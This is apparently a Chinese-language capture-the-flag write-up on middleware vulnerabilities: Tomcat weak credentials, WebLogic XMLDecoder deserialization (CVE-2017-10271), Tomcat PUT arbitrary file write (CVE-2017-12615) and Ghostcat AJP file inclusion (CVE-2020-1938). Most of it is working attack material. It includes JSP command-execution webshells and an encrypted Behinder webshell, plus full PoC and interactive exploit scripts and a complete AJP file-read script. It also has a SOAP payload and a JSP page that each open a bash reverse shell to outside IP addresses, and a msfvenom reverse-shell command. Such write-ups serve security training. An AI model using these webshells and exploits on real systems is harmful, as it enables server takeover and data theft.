安鸾之中间件系列

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！
本文首发于涂寐’s Blogs：https://0xtlu.github.io，转载请注明出处！

0x00 tomcat8弱口令

0o00 题目提示

tomcat8弱口令

题目URL：http://106.15.50.112:18081

提示：flag在网站根目录下！

0o01 测试过程

• 随便找篇文章查看，访问：http://106.15.50.112:18081/manager/html。

• 弹窗输入账密：tomcat/tomcat

• jsp 代码

  <%@ page language="java" contentType="text/html; charset=GBK"
      pageEncoding="UTF-8"%>
  <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  <html>
  
      <head>
          <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
          <title>一句话木马</title>
      </head>
  
      <body>
          <%
          if ("admin".equals(request.getParameter("pwd"))) {
              java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
              int len = -1;
              byte[] bytes = new byte[4092];
              out.print("<pre>");
              while ((len = input.read(bytes)) != -1) {
                  out.println(new String(bytes, "GBK"));
              }
              out.print("</pre>");
          }
      %>
      </body>
  
  </html>

• 制作 war 包，jsp文件压缩成 zip 文件，改后缀为 war。上传站点。

• 部分命令使用。

  // 看不到 flag 相关文件
  http://106.15.50.112:18081/jsp/jsp.jsp?pwd=admin&cmd=ls
  
  // 查看当前位置：/usr/local/tomcat
  http://106.15.50.112:18081/jsp/jsp.jsp?pwd=admin&cmd=pwd
  
  // 不懂 tomcat，直接查找包含 flag 的文件
  http://106.15.50.112:18081/jsp/jsp.jsp?pwd=admin&cmd=find%20/%20-name%20*flag*
  
  // 拿 flag：flag{828a7a1a2c4bdc5b287f0d0fe72cf0ff}
  http://106.15.50.112:18081/jsp/jsp.jsp?pwd=admin&cmd=cat%20/usr/local/tomcat/webapps/ROOT/this_flag_2c4bdc5b287f0d0f.txt

0o02 Tomcat 目录结构

bin-----存放Tomcat的脚本文件，例如启动、关闭
conf----Tomcat的配置文件，例如server.xml和web.xml
lib-----存放Tomcat运行需要的库文件（JAR包）
logs----存放Tomcat执行时的LOG文件
temp----存放Tomcat运行时所产生的临时文件
webapps-Web发布目录，默认情况下把Web应用文件放于此目录
work----存放jsp编译后产生的class文件
里面一些重要的文件，需要了解其作用：
server.xml：配置tomcat启动的端口号、host主机、Context等
web.xml文件：部署描述文件，这个web.xml中描述了一些默认的servlet，部署每个webapp时，都会调用这个文件，配置该web应用的默认servlet
tomcat-users.xml：tomcat的用户密码与权限。

0x01 Weblogic弱口令&反序列化

0o00 题目提示

Weblogic弱口令&反序列化

网站URL：http://106.15.50.112:17001

提示：
本环境存在大量漏洞：
控制台弱口令、CVE-2014-4210、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2019-2725、CVE-2020-14882、CVE-2020-14883

0o01 测试过程

0b00 控制台弱口令

• 直接访问给的链接，404，听说是正常的。看别人复现吧。
• 默认后台：http://106.15.50.112:17001/console/login/LoginForm.jsp
• 默认口令： weblogic / Oracle@123
• 部署 –> 安装 –> 上载文件 –> 将部署上载到管理服务器 –> 一直下一步到完成。

• 这里是冰蝎马，但还是得 find 。
• flag 路径：/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_user/_appsdir_hello_war/hnt8u/war/this_is_flag7cd3d2fc9cec6901.txt
• flag：flag{04c89e5c3d0d926f510ba9e8ebd513bf}

0b01 CVE-2017-10271

• CVE-2017-10271 WebLogic XMLDecoder 反序列化漏洞由 WebLogic Server WLS 组件远程命令执行漏洞，由 wls-wsat.war 触发该漏洞。该漏洞可通过构建 post 请求发送恶意 SOAP（xml） 数据，在解析过程中触发该漏洞。
• 如下页面则可能存在，访问链接http://106.15.50.112:17001/wls-wsat/CoordinatorPortType11

• 构造请求包。
• GET 请求改为 POST 请求。
• 添加请求头：Content-Type: text/xml
• 加上大佬构造成反弹 Shell 的 SOAP 数据。
• 此处修改反弹 shell 的 bash 命令，改为写马：echo hello whalwl>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/hello.txt；
• 服务器路径：/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/hello.txt；
• 网页链接：http://106.15.50.112:17001/wls-wsat/hello.txt

  POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
  Host: 106.15.50.112:17001
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  Content-Type: text/xml
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36 Edg/103.0.1264.44
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  Cookie: type=posttime; Hm_lvt_48042604b3c7a9973810a87540843e34=1656610521,1656611930,1656635518,1656651819; roc_login=a111; roc_secure=ijcS7EUXP2kc7dX6cmEa%252BHh%252BvGfhfh49pUdHpDOaiSo%253D; ADMINCONSOLESESSION=btqbv13Llmvpp98hgvcB01Kdw5rDvXDdsg2VYcXrrPhm081MGkmk!-1333354029; JSESSIONID=lrBMv15Nmclr6jvxvgncp7k0pyGgzl2h1hQN3vRTXzHqycnGq4lm!-1333354029
  Connection: close
  Content-Length: 644
  
  <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
  <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  <java version="1.4.0" class="java.beans.XMLDecoder">
  <void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
  <void index="0">
  <string>/bin/bash</string>
  </void>
  <void index="1">
  <string>-c</string>
  </void>
  <void index="2">
  <string>bash -i &gt;&amp; /dev/tcp/120.24.241.34/6868 0&gt;&amp;1</string>
  </void>
  </array>
  <void method="start"/></void>
  </java>
  </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
  </soapenv:Envelope>

• 直接拿工具扫不香吗

0x02 tomcat任意文件写入

0o00 题目提示

tomcat任意文件写入

题目URL：http://106.15.50.112:18082

提示：
1、Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)
2、flag在网站根目录下！

0o01 测试过程

0b00 手工测试

• 抓取 http://106.15.50.112:18082 界面请求包；
• GET 请求修改为 PUT 请求；
• 末尾添加冰蝎 jsp 木马。
• URL：http://106.15.50.112:18082/shell666.jsp

  PUT /shell666.jsp/ HTTP/1.1
  Host: 106.15.50.112:18082
  Cache-Control: max-age=0
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36 Edg/103.0.1264.44
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Encoding: gzip, deflate
  Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  Cookie: type=posttime; Hm_lvt_48042604b3c7a9973810a87540843e34=1656610521,1656611930,1656635518,1656651819; roc_login=a111; roc_secure=ijcS7EUXP2kc7dX6cmEa%252BHh%252BvGfhfh49pUdHpDOaiSo%253D; ADMINCONSOLESESSION=SyzfvQTGZnSCmkjnnGcV8TJ38v5bGk5m4VkHGmD8gyCDtLTdbQbT!-1333354029; JSESSIONID=CBB3B0EC25E322680209BC5533CDC66E
  Connection: close
  Content-Length: 614
  
  <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

0b01 纸机大佬脚本

• 纸机大佬写的POC

• 纸机大佬相关文章：https://www.cnblogs.com/confidant/p/15440233.html

  // 单个，注意网址
  python3 CVE-2017-15715-POC.py.py -u http://106.15.50.112 -p 18082
  
  // 批量
  python3 CVE-2017-15715-POC.py.py -f IP.txt

  #CVE-2017-12615 POC
  __author__ = '纸机'
  import requests
  import optparse
  import os
  
  parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
  parse.add_option('-u','--url',dest='URL',help='target url')
  parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
  parse.add_option('-f',dest='FILE',help='target list')
  
  options,args = parse.parse_args()
  #print(options)
  #验证参数是否完整
  if (not options.URL or not options.PORT) and not options.FILE:
          print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port] [-f FILE]\n')
          exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
  
  filename = '/hello.jsp'
  
  #测试数据
  data = 'hello'
  
  #提交PUT请求
  #resp = requests.post(url1,headers=headers,data=data)
  
  #验证文件是否上传成功
  #response = requests.get(url2)
  #上传文件
  def upload(url):
    try:
      response = requests.put(url+filename+'/',data=data)
      return 1
    except Exception as e:
      print("[-] {0} 连接失败".format(url))
      return 0
  def checking(url):
    try:
      #验证文件是否上传成功
      response = requests.get(url+filename)
      #print(url+filename)
      if response.status_code == 200 and 'hello' in response.text:
        print('[+] {0} 存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))
      else:
        print('[-] {0} 不存在CVE-2017-12615 Tomcat 任意文件读写漏洞'.format(url))
    except Exception as e:
                  #print(e)
      print("[-] {0} 连接失败".format(url))
  if options.FILE and os.path.exists(options.FILE):
    with open(options.FILE) as f:
      urls = f.readlines()
      #print(urls)
      for url in urls:
        url = str(url).replace('\n', '').replace('\r', '').strip()
        if upload(url) == 1:
          checking(url)
  elif options.FILE and not os.path.exists(options.FILE):
    print('[-] {0} 文件不存在'.format(options.FILE))
  else:
    #上传链接
    url = options.URL+':'+options.PORT
    if upload(url) == 1:
      checking(url)

• 纸机大佬写的exp

  #CVE-2017-12615 EXP
  #python3 CVE-2017-15715-EXP.py.py -u http://106.15.50.112 -p 18082
  __author__ = '纸机'
  import requests
  import optparse
  import time
  
  
  parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT]')
  parse.add_option('-u','--url',dest='URL',help='target url')
  parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
  
  options,args = parse.parse_args()
  #验证参数是否完整
  if not options.URL or not options.PORT:
          print('Usage:python3 CVE-2017-12615-POC.py [-u url] [-p port]\n')
          exit('CVE-2017-12615-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
  
  url = options.URL+':'+options.PORT
  filename = '/backdoor.jsp'
  payload = filename+'?pwd=023&i='
  
  headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0"}
  #木马
  data = '''<%
      if("023".equals(request.getParameter("pwd"))){
          java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
          int a = -1;
          byte[] b = new byte[2048];
          out.print("<pre>");
          while((a=in.read(b))!=-1){
              out.println(new String(b));
          }
          out.print("</pre>");
      }
  
  %>'''
  #上传木马文件
  def upload(url):
    print('[*] 目标地址:'+url)
    try:
      respond = requests.put(url+filename+'/',headers=headers,data = data)
      #print(respond.status_code)
      if respond.status_code == 201 or respond.status_code == 204:
        #print('[*] 目标地址:'+url)
        print('[+] 木马上传成功')
    except Exception as e:
      print('[-] 上传失败')
      return 0
  
  #命令执行
  def attack(url,cmd):
    try:
      respond = requests.get(url+payload+cmd)
      if respond.status_code == 200:
        print(str(respond.text).replace("<pre>","").replace("</pre>","").strip())
  
    except Exception as e:
      print('[-] 命令执行错误')
  if upload(url) == 0:
          exit()
  time.sleep(0.5)
  print('输入执行命令(quit退出):')
  while(1):
    cmd = input('>>>')
    if(cmd == 'quit'):
      break
    attack(url,cmd)

0b10其他大佬脚本

• 脚本一把梭

  运行脚本：python3 CVE-2017-12615.py http://106.15.50.112:18082
  
  http://106.15.50.112:18082/201712615.jsp?pwd=fff&cmd=find%20/%20-name%20*flag*
  或
  http://106.15.50.112:18082/201712615.jsp?pwd=fff&cmd=ls%20-R
  
  // 拿flag：flag{1835f7ba6689c37d4804bdfdbc4fd70d}
  http://106.15.50.112:18082/201712615.jsp?pwd=fff&cmd=cat%20/usr/local/tomcat/webapps/ROOT/this_flag_6689c37d4804bdfd.txt

  import requests
  import sys
  import time
   
  '''
  Usage:
  	python CVE-2017-12615.py http://127.0.0.1
  	shell: http://127.0.0.1/201712615.jsp?pwd=fff&cmd=whoami
  '''
   
  def attack(url):
  	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
  	headers={"User-Agent":user_agent}
  	data="""<%
      if("fff".equals(request.getParameter("pwd"))){
          java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
          int a = -1;
          byte[] b = new byte[2048];
          out.print("<pre>");
          while((a=in.read(b))!=-1){
              out.println(new String(b));
          }
          out.print("</pre>");
      }
  %>"""
  	try:
  		requests.put(url, headers=headers, data=data)
   
  		time.sleep(2)
   
  		verify_response = requests.get(url[:-1], headers=headers)
   
  		if verify_response.status_code == 200:
  			print('success')
  		else :
  			print (verify_response.status_code)
   
  	except :
  		"error"
   
  if __name__ == '__main__':
  	target_url = sys.argv[1] + '/201712615.jsp/'
   
  	attack(target_url)
  	print ('shell: ' + target_url[:-1])
   

0o02 CVE-2017-12615

• 漏洞概述：运行在 Windows 操作系统的 Tomcat ，启用 HTTP PUT 请求方法（readonly 初始化参数由默认值 true 设置为 false），则攻击者可构造恶意请求包向服务器上传包含任意代码的 JSP 文件。当JSP文件中的恶意代码被服务器执行时，将导致服务器上的数据泄露或获取服务器权限。
• 影响范围：Apache Tomcat 7.0.0 - 7.0.79。
• 漏洞防护：① 设置 conf/webxml 文件的 readOnly 值为 Ture 或注释参数；② 禁用 PUT 方法并重启 tomcat 服务。注：禁用 PUT 方法时，对于依赖 PUT 方法的应用可能会导致业务失效；③ 升级到最新版本；④ 使用WAF产品进行防御。
• 注：通过对站点的观察：Apache Tomcat/8.5.19；对 URL 大小写判断，初步判断为 Linux 系统；这是扩大范围了？

0x03 Apache Tomcat AJP 文件包含漏洞

0o00 题目提示

Apache Tomcat AJP 文件包含漏洞（CVE-2020-1938）

题目URL：http://106.15.50.112:18080/whalwl/
ajp端口：18009

Ghostcat（幽灵猫） 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞，
由于 Tomcat AJP 协议设计上存在缺陷，攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件，
例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下，配合文件包含的利用还可以达到远程代码执行的危害。
这个漏洞影响全版本默认配置下的 Tomcat（在我们发现此漏洞的时候，确认其影响 Tomcat 9/8/7/6 全版本，
而年代过于久远的更早的版本未进行验证），这意味着它在 Tomcat 里已经潜伏了长达十多年的时间。

0o01 测试过程

0b000 版本探测

• nmap探测

  # 18009端口，Apache Tomcat 9.0.30，满足CVE-2020-1938存在环境
  sudo nmap 106.15.50.112 -p 18080 -sV -sS
  
  # 18009端口，探测不出服务，被ban
  sudo nmap 106.15.50.112 -p 18009 -sV -sS
  
  # 整合
  sudo nmap 106.15.50.112 -p 18009,18080 -sV -sS

• 报错探测

  http://106.15.50.112:18080/whalwl/admin

0b001 脚本测试

• AjPy验证工具：https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
• 通过python脚本利用AJP BUG读取webapp任意目录下文件，以/WEB-INF/web.xml为例
• 默认 Python2 环境运行
• ???路径有问题???修复了???
• 测试读取不存在文件，报错：HTTP Status 500 – Internal Server Error–>确定：路径问题。

  python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 106.15.50.112 -p 18009 -f WEB-INF/web.xml
  
  # 注 
  # python3的使用
  # 听说，如下修改 CNVD-2020-10487-Tomcat-Ajp-lfi.py
  # 测试，没成功
  # 报错：AttributeError: 'Tomcat' object has no attribute 'stream'
  '''
  self.socket.makefile("rb", bufsize=0)
  替换为
  self.socket.makefile("rb", buffering=0)
  
  print("".join([d.data for d in data]))
  替换为
  print("".join([d.data.decode() for d in data]))
  '''

0b010 目录说明

# vulhub 漏洞靶机中8080端口的网站根目录
/usr/local/tomcat/webapps/ROOT

# 搭建靶场
# 物理路径：
/usr/local/tomcat/webapps/ROOT/test/CVE-2020-19381.png
# 网络路径
http://192.168.255.130:8080/test/CVE-2020-19381.png

# 修复测试，无法修复
# 注释 conf/server.xml 中的<Connector port=“8009” protocol="AJP/1.3"redirectPort=“8443” />
# 报错，排除靶场漏洞已修复
Traceback (most recent call last):
  File "CNVD-2020-10487-Tomcat-Ajp-lfi.py", line 295, in <module>
    t = Tomcat(args.target, args.port)
  File "CNVD-2020-10487-Tomcat-Ajp-lfi.py", line 261, in __init__
    self.socket.connect((target_host, target_port))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 111] Connection refused

0b011 跨目录问题

# 目录扫描命令
dirb http://106.15.50.112:18080/

# 结果
+ http://106.15.50.112:18080/docs (CODE:302|SIZE:0)
+ http://106.15.50.112:18080/examples (CODE:302|SIZE:0)
+ http://106.15.50.112:18080/host-manager (CODE:302|SIZE:0)
+ http://106.15.50.112:18080/manager (CODE:302|SIZE:0)

# 又：靶场站点默认路径 http://106.15.50.112:18080/whalwl/
# 推测：/usr/local/tomcat/webapps/whalwl
# 即：ROOT 目录文件与 whalwl 同级
# 又：脚本默认读取 ROOT 目录中文件
# 故：若想读取 webapps 其他目录（如 whalwl）下的文件，需要对脚本进行修改，即问题所在

# 如下代码已修改
# CNVD-2020-10487-Tomcat-Ajp-lfi.py 的 296行：
# _,data = t.perform_request('/asdf',attributes=[
# 修改为
# _,data = t.perform_request('/whalwl/asdf',attributes=[  

#!/usr/bin/env python
#CNVD-2020-10487  Tomcat-Ajp lfi
#by ydhcui
import struct

# Some references:
# https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html
def pack_string(s):
	if s is None:
		return struct.pack(">h", -1)
	l = len(s)
	return struct.pack(">H%dsb" % l, l, s.encode('utf8'), 0)
def unpack(stream, fmt):
	size = struct.calcsize(fmt)
	buf = stream.read(size)
	return struct.unpack(fmt, buf)
def unpack_string(stream):
	size, = unpack(stream, ">h")
	if size == -1: # null string
		return None
	res, = unpack(stream, "%ds" % size)
	stream.read(1) # \0
	return res
class NotFoundException(Exception):
	pass
class AjpBodyRequest(object):
	# server == web server, container == servlet
	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
	MAX_REQUEST_LENGTH = 8186
	def __init__(self, data_stream, data_len, data_direction=None):
		self.data_stream = data_stream
		self.data_len = data_len
		self.data_direction = data_direction
	def serialize(self):
		data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
		if len(data) == 0:
			return struct.pack(">bbH", 0x12, 0x34, 0x00)
		else:
			res = struct.pack(">H", len(data))
			res += data
		if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
			header = struct.pack(">bbH", 0x12, 0x34, len(res))
		else:
			header = struct.pack(">bbH", 0x41, 0x42, len(res))
		return header + res
	def send_and_receive(self, socket, stream):
		while True:
			data = self.serialize()
			socket.send(data)
			r = AjpResponse.receive(stream)
			while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
				r = AjpResponse.receive(stream)

			if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
				break
class AjpForwardRequest(object):
	_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28)
	REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE}
	# server == web server, container == servlet
	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
	COMMON_HEADERS = ["SC_REQ_ACCEPT",
		"SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION",
		"SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2",
		"SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
	]
	ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
	def __init__(self, data_direction=None):
		self.prefix_code = 0x02
		self.method = None
		self.protocol = None
		self.req_uri = None
		self.remote_addr = None
		self.remote_host = None
		self.server_name = None
		self.server_port = None
		self.is_ssl = None
		self.num_headers = None
		self.request_headers = None
		self.attributes = None
		self.data_direction = data_direction
	def pack_headers(self):
		self.num_headers = len(self.request_headers)
		res = ""
		res = struct.pack(">h", self.num_headers)
		for h_name in self.request_headers:
			if h_name.startswith("SC_REQ"):
				code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
				res += struct.pack("BB", 0xA0, code)
			else:
				res += pack_string(h_name)

			res += pack_string(self.request_headers[h_name])
		return res

	def pack_attributes(self):
		res = b""
		for attr in self.attributes:
			a_name = attr['name']
			code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
			res += struct.pack("b", code)
			if a_name == "req_attribute":
				aa_name, a_value = attr['value']
				res += pack_string(aa_name)
				res += pack_string(a_value)
			else:
				res += pack_string(attr['value'])
		res += struct.pack("B", 0xFF)
		return res
	def serialize(self):
		res = ""
		res = struct.pack("bb", self.prefix_code, self.method)
		res += pack_string(self.protocol)
		res += pack_string(self.req_uri)
		res += pack_string(self.remote_addr)
		res += pack_string(self.remote_host)
		res += pack_string(self.server_name)
		res += struct.pack(">h", self.server_port)
		res += struct.pack("?", self.is_ssl)
		res += self.pack_headers()
		res += self.pack_attributes()
		if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
			header = struct.pack(">bbh", 0x12, 0x34, len(res))
		else:
			header = struct.pack(">bbh", 0x41, 0x42, len(res))
		return header + res
	def parse(self, raw_packet):
		stream = StringIO(raw_packet)
		self.magic1, self.magic2, data_len = unpack(stream, "bbH")
		self.prefix_code, self.method = unpack(stream, "bb")
		self.protocol = unpack_string(stream)
		self.req_uri = unpack_string(stream)
		self.remote_addr = unpack_string(stream)
		self.remote_host = unpack_string(stream)
		self.server_name = unpack_string(stream)
		self.server_port = unpack(stream, ">h")
		self.is_ssl = unpack(stream, "?")
		self.num_headers, = unpack(stream, ">H")
		self.request_headers = {}
		for i in range(self.num_headers):
			code, = unpack(stream, ">H")
			if code > 0xA000:
				h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
			else:
				h_name = unpack(stream, "%ds" % code)
				stream.read(1) # \0
			h_value = unpack_string(stream)
			self.request_headers[h_name] = h_value
	def send_and_receive(self, socket, stream, save_cookies=False):
		res = []
		i = socket.sendall(self.serialize())
		if self.method == AjpForwardRequest.POST:
			return res

		r = AjpResponse.receive(stream)
		assert r.prefix_code == AjpResponse.SEND_HEADERS
		res.append(r)
		if save_cookies and 'Set-Cookie' in r.response_headers:
			self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']

		# read body chunks and end response packets
		while True:
			r = AjpResponse.receive(stream)
			res.append(r)
			if r.prefix_code == AjpResponse.END_RESPONSE:
				break
			elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
				continue
			else:
				raise NotImplementedError
				break

		return res

class AjpResponse(object):
	_,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
	COMMON_SEND_HEADERS = [
			"Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
			"Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
			]
	def parse(self, stream):
		# read headers
		self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")

		if self.prefix_code == AjpResponse.SEND_HEADERS:
			self.parse_send_headers(stream)
		elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
			self.parse_send_body_chunk(stream)
		elif self.prefix_code == AjpResponse.END_RESPONSE:
			self.parse_end_response(stream)
		elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
			self.parse_get_body_chunk(stream)
		else:
			raise NotImplementedError

	def parse_send_headers(self, stream):
		self.http_status_code, = unpack(stream, ">H")
		self.http_status_msg = unpack_string(stream)
		self.num_headers, = unpack(stream, ">H")
		self.response_headers = {}
		for i in range(self.num_headers):
			code, = unpack(stream, ">H")
			if code <= 0xA000: # custom header
				h_name, = unpack(stream, "%ds" % code)
				stream.read(1) # \0
				h_value = unpack_string(stream)
			else:
				h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001]
				h_value = unpack_string(stream)
			self.response_headers[h_name] = h_value

	def parse_send_body_chunk(self, stream):
		self.data_length, = unpack(stream, ">H")
		self.data = stream.read(self.data_length+1)

	def parse_end_response(self, stream):
		self.reuse, = unpack(stream, "b")

	def parse_get_body_chunk(self, stream):
		rlen, = unpack(stream, ">H")
		return rlen

	@staticmethod
	def receive(stream):
		r = AjpResponse()
		r.parse(stream)
		return r

import socket

def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
	fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
	fr.method = method
	fr.protocol = "HTTP/1.1"
	fr.req_uri = req_uri
	fr.remote_addr = target_host
	fr.remote_host = None
	fr.server_name = target_host
	fr.server_port = 80
	fr.request_headers = {
		'SC_REQ_ACCEPT': 'text/html',
		'SC_REQ_CONNECTION': 'keep-alive',
		'SC_REQ_CONTENT_LENGTH': '0',
		'SC_REQ_HOST': target_host,
		'SC_REQ_USER_AGENT': 'Mozilla',
		'Accept-Encoding': 'gzip, deflate, sdch',
		'Accept-Language': 'en-US,en;q=0.5',
		'Upgrade-Insecure-Requests': '1',
		'Cache-Control': 'max-age=0'
	}
	fr.is_ssl = False
	fr.attributes = []
	return fr

class Tomcat(object):
	def __init__(self, target_host, target_port):
		self.target_host = target_host
		self.target_port = target_port

		self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
		self.socket.connect((target_host, target_port))
		self.stream = self.socket.makefile("rb", bufsize=0)

	def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
		self.req_uri = req_uri
		self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
		print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
		if user is not None and password is not None:
			self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '')
		for h in headers:
			self.forward_request.request_headers[h] = headers[h]
		for a in attributes:
			self.forward_request.attributes.append(a)
		responses = self.forward_request.send_and_receive(self.socket, self.stream)
		if len(responses) == 0:
			return None, None
		snd_hdrs_res = responses[0]
		data_res = responses[1:-1]
		if len(data_res) == 0:
			print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
		return snd_hdrs_res, data_res

'''
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path
'''

import argparse
parser = argparse.ArgumentParser()
parser.add_argument("target", type=str, help="Hostname or IP to attack")
parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
args = parser.parse_args()
t = Tomcat(args.target, args.port)
_,data = t.perform_request('/whalwl/asdf',attributes=[
    {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']},
    {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]},
    {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
    ])
print('----------------------------')
print("".join([d.data for d in data]))

0b100 getshell(一)

• 反弹shell一（推荐）：

  <%
  java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI1NS4xMzAvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}").getInputStream();
  int a = -1;
  byte[] b = new byte[2048];
  out.print("<pre>");
  while((a=in.read(b))!=-1){
  out.println(new String(b));
  }
  out.print("</pre>");
  %>

• 反弹shell二：

  # msf生成，具体生成下文已给出
  msfvenom -p java/jsp_shell_reverse_tcp LHOST=43.138.193.108 LPORT=4445 R >shell.jsp
